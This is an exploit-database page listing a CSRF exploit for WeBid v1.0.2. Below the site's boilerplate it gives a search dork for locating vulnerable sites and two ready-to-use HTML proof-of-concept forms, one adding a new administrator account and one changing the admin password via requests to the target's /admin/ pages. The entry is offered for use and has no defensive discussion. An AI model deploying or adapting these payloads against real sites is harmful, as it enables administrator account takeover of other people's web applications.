0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WeBid v1.0.2 Multiple Remote (CSRF) Vulnerabilities
[1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ### # Title : WeBid v1.0.2 Multiple Remote (CSRF) Vulnerabilities # Author : KedAns-Dz # E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Web Site : www.1337day.com * www.exploit-id.com # Twitter page : twitter.com/kedans # platform : php # Impact : Multple CSRF ( Add New User & Change Admin PWD) # Tested on : [FreeBSD 8.2 (RELEASE)] & [Linux.(Ubuntu 10.10)] & [Windows XP SP3 (Fr)] ## # +----+ xXx < Greetings to 'indoushka' at the Jail > xXx +----+ ## # Noting to all my friends and my Family : (my BAC 2011 is bosh) -> BAC 2012 I will be coming ! # > Hredtha fe elMATH mo3amil 6 & fe lePHYSICs mo3almil 6 tani makan m4k4n pffff (x_x) ... # Sah kont CaVa em3a le Engineering Elicrtic m034mil 7 ! mes ma3andha ma t3aWedh 3la loKhrin3 # +----------+ X==================== S x H x I x T ====================X +----------+ ### # (°) D0rk : "Powered by WeBid © " < 0r > 'inurl:"upldgallery.php"' # (+) Exploit & PoC : #===[ PoC (1) Add New User ]=======> <div> <h3> (CSRF) Add NeW User - ToolKit :</h3> <form name="conf" action="http://[target]/admin/newadminuser.php" method="post"> <table> <input type="text" name="username" value="KedAns-Dz"> <input type="password" name="password" value=""> <input type="password" name="repeatpassword" value=""> </table> <input type="hidden" name="action" value="update"> <input type="submit" name="act" class="centre" value="Submit"> </form> </div> #===[ PoC (2) Change Admin Password ]=======> <div> <h3> (CSRF) Change Admin Password - ToolKit :</h3> <form name="editadmin" action="http://[target]/admin/editadminuser.php?id=1" method="post"> <table> <input type="password" name="password"> <input type="password" name="repeatpassword"> </table> <input type="hidden" name="action" value="update"> <input type="hidden" name="id" value="1"> <input type="submit" name="act" class="centre" value="Update"> </form> </div> # (^_^) ! Good Luck ALL ... # 0day.today [2024-11-15] #